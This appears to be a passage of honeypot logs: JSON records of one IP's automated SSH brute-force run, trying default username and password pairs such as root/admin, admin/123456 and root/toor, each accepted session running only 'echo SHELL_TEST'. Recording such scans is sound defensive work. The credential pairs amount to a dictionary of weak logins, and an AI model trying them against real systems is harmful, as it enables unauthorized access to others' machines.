"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:32.975672Z",
"end_time": "2026-06-29T23:26:34.759149Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "admin"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: admin / 123456
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "afc917787dac",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:30.764042Z",
"end_time": "2026-06-29T23:26:32.735074Z",
"duration": "2.0",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "admin",
"pass": "123456"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123456
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "f4654534bc6a",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:28.766571Z",
"end_time": "2026-06-29T23:26:30.526229Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123456"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / toor
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "253e1b0c2e96",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:26.676630Z",
"end_time": "2026-06-29T23:26:28.531751Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "toor"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities:
{
"id": "42441b3d5790",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:24.237258Z",
"end_time": "2026-06-29T23:26:26.424812Z",
"duration": "2.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "",
"pass": ""
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: test / test
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "5f8f1609ae5f",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:22.278735Z",
"end_time": "2026-06-29T23:26:24.007793Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "test",
"pass": "test"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: guest / guest
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c22a82188041",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:20.270898Z",
"end_time": "2026-06-29T23:26:22.047467Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "guest",
"pass": "guest"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: support / support
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "36a65b7e564b",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:18.310499Z",
"end_time": "2026-06-29T23:26:20.033070Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "support",
"pass": "support"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: user /
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "3b20a2bc86cd",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:16.332788Z",
"end_time": "2026-06-29T23:26:18.080091Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": ""
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / password
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "b4f862dca8a3",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:13.178998Z",
"end_time": "2026-06-29T23:26:15.036293Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "password"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / user
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c91aebd05fc4",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:11.134638Z",
"end_time": "2026-06-29T23:26:12.929205Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "user"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: admin /
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "ce19e70df56c",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:09.181220Z",
"end_time": "2026-06-29T23:26:10.893521Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "admin",
"pass": ""
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: admin / 12345
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c773b5405b46",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:07.100377Z",
"end_time": "2026-06-29T23:26:08.950647Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "admin",
"pass": "12345"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: admin / password
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "e04cfe07da13",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:05.074068Z",
"end_time": "2026-06-29T23:26:06.851687Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "admin",
"pass": "password"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: admin / admin
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "55b21a71bc38",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:02.903535Z",
"end_time": "2026-06-29T23:26:04.835181Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "admin",
"pass": "admin"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root /
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "a56b3943b2d2",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:26:00.911692Z",
"end_time": "2026-06-29T23:26:02.664012Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": ""
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / password
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "32af67ca80d3",
"src_ip": "182.19.35.57",
"start_time": "2026-06-29T23:25:58.924339Z",
"end_time": "2026-06-29T23:26:00.677413Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "password"
},
"commands": [
"echo SHELL_TEST"
],
"detailed_commands": [
{
"cmd": "echo SHELL_TEST",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}